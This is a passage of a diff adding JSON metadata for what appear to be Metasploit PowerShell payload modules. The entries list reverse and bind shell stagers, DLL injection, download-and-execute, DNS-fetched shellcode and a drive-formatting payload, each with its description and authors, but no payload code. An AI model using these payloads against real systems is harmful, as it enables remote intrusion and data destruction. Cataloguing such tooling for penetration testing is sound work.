"ref_name": "cmd/windows/powershell/dllinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_http", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/dllinject/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/dllinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/dllinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/dllinject/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/dllinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dllinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/dllinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/dns_txt_query_exec": { + "name": "Powershell Exec, DNS TXT Record Payload Download and Execution", + "fullname": "payload/cmd/windows/powershell/dns_txt_query_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\noption is used as the base name to iterate over. The payload will first request the TXT contents of the a\nhostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n255 bytes from it are copied into a buffer that is eventually executed. This buffer should be encoded using\nx86/alpha_mixed with the BufferRegister option set to EDI.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/dns_txt_query_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/dns_txt_query_exec", + "staged": false + }, + "payload_cmd/windows/powershell/download_exec": { + "name": "Powershell Exec, Windows Executable Download (http,https,ftp) and Execute", + "fullname": "payload/cmd/windows/powershell/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/download_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/download_exec", + "staged": false + }, + "payload_cmd/windows/powershell/exec": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/exec", + "staged": false + }, + "payload_cmd/windows/powershell/format_all_drives": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/format_all_drives", + "aliases": [], + "rank": 0, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "Ashfaq Ansari ", + "Ruei-Min Jiang " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [ + "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", + "URL-https://github.com/hacksysteam/ShellcodeOfDeath" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/format_all_drives", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "AKA": [ + "ShellcodeOfDeath" + ] + }, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/format_all_drives", + "staged": false + }, + "payload_cmd/windows/powershell/generic/debug_trap": { + "name": "Powershell Exec, Generic x86 Debug Trap", + "fullname": "payload/cmd/windows/powershell/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "robert " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/windows/powershell/generic/tight_loop": { + "name": "Powershell Exec, Generic x86 Tight Loop", + "fullname": "payload/cmd/windows/powershell/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "jduck " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/windows/powershell/loadlibrary": { + "name": "Powershell Exec", + "fullname": "payload/cmd/windows/powershell/loadlibrary", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/loadlibrary", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/loadlibrary", + "staged": false + }, + "payload_cmd/windows/powershell/messagebox": { + "name": "Powershell Exec, Windows MessageBox", + "fullname": "payload/cmd/windows/powershell/messagebox", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "corelanc0d3r ", + "jduck " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/messagebox", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/messagebox", + "staged": false + }, + "payload_cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/meterpreter/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_named_pipe", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/meterpreter/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "skape ", + "sf ", + "OJ Reeves", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/meterpreter", + "stager_refname": 